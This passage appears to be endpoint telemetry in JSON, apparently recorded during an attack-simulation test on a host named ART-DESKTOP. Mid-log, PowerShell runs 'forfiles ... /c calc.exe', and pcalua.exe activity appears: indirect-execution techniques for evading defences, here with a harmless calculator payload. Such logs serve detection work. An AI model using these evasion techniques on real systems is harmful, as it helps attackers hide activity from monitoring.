"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", + "registry_value": 
"SequenceNumber", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574015270000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574015270000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": 
"AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574015440000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574019560000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_value": "W32:00000000000305D2", + "timestamp": 131883574019730000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "terminate", + "timestamp": 131883574019820000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + 
"registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574019820000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574019820000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574019920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574019920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574020000000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574020000000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574020000000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "process", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574020040000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5532, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574020110000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "file", + "file_name": "PCALUA.EXE-5EB8CBC1.pf", + "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574020100000, + "unique_pid": 
"{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020100000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "process", + "pid": 5532, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574020180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_value": "W32:00000000000305D2", + "timestamp": 131883574020360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574020360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p 
c:\\windows\\system32 /m notepad.exe /c calc.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5004, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5004, + 
"process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4500, + "ppid": 5004, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "create", + "timestamp": 131883574020900000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", + "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": 
"Software Publishing", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "forfiles.exe", + "image_path": "C:\\Windows\\System32\\forfiles.exe", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
